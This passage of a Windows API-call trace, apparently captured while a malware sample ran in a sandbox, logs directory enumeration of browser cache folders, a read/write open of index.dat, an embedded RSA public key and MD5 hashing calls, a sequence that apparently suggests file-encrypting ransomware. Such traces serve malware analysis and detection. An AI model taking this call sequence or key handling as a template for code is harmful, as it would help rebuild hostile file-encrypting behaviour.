ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0206.597] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0206.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0206.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0206.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.598] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0206.599] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77b90 | out: hHeap=0x2c0000) returned 1 [0206.600] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.600] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.600] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.600] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.600] PathFindFileNameW (pszPath="") returned="" [0206.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77ad8 | out: hHeap=0x2c0000) returned 1 [0206.603] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.603] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0206.603] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0206.603] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0206.603] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0206.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.604] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=32768) returned 1 [0206.604] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.606] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.606] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.608] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.608] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8000, lpOverlapped=0x0) returned 1 [0206.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.609] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0206.610] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.610] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.610] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.610] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.610] GetLastError () returned 0x0 [0206.610] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.610] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0206.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.610] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.610] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.610] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8000) returned 0x3b87c98 [0206.610] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b871c0 [0206.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87208 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.611] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79ce0 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79cc8 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b817c0 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.611] RtlAllocateHeap (HeapHandle=0x2c0000, 